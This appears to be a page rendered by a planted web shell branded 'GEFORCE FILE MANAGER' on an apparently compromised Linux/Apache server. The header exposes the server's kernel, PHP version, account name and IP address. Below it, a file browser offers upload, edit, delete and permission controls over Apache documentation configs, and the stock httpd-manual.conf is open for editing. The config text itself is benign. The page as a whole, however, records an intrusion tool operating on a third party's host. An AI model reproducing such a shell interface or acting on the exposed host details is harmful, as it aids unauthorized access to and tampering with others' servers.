[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
doc
/
ea-apache24
/
docs
/
conf
/
extra
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 httpd-dav.conf
1,930 B
SET
[ EDIT ]
|
[ DEL ]
📄 httpd-default.conf
2,942 B
SET
[ EDIT ]
|
[ DEL ]
📄 httpd-languages.conf
5,078 B
SET
[ EDIT ]
|
[ DEL ]
📄 httpd-manual.conf
1,395 B
SET
[ EDIT ]
|
[ DEL ]
📄 httpd-mpm.conf
4,456 B
SET
[ EDIT ]
|
[ DEL ]
📄 httpd-multilang-errordoc.conf
2,222 B
SET
[ EDIT ]
|
[ DEL ]
📄 httpd-vhosts.conf
1,519 B
SET
[ EDIT ]
|
[ DEL ]
📄 proxy-html.conf
3,161 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: httpd-manual.conf
# # Provide access to the documentation on your server as # http://yourserver.example.com/manual/ # The documentation is always available at # http://httpd.apache.org/docs/2.4/ # # Required modules: mod_alias, mod_authz_core, mod_authz_host, # mod_setenvif, mod_negotiation # AliasMatch ^/manual(?:/(?:da|de|en|es|fr|ja|ko|pt-br|ru|tr|zh-cn))?(/.*)?$ "/usr/share/apache2/manual$1" <Directory "/usr/share/apache2/manual"> Options Indexes AllowOverride None Require all granted <Files *.html> SetHandler type-map </Files> # .tr is text/troff in mime.types! RemoveType tr # Traditionally, used .dk filename extension for da language AddLanguage da .da SetEnvIf Request_URI ^/manual/(da|de|en|es|fr|ja|ko|pt-br|ru|tr|zh-cn)/ prefer-language=$1 RedirectMatch 301 ^/manual(?:/(da|de|en|es|fr|ja|ko|pt-br|ru|tr|zh-cn)){2,}(/.*)?$ /manual/$1$2 # Reflect the greatest effort in translation (most content available), # inferring greater attention to detail (potentially false assumption, # counting translations presently in-sync would be more helpful.) # Use caution counting; safest pattern is '*.xml.XX'. Recent .xml source # document count: 266 214 110 94 82 25 22 18 4 1 1 LanguagePriority en fr ko ja tr es de zh-cn pt-br da ru ForceLanguagePriority Prefer Fallback </Directory>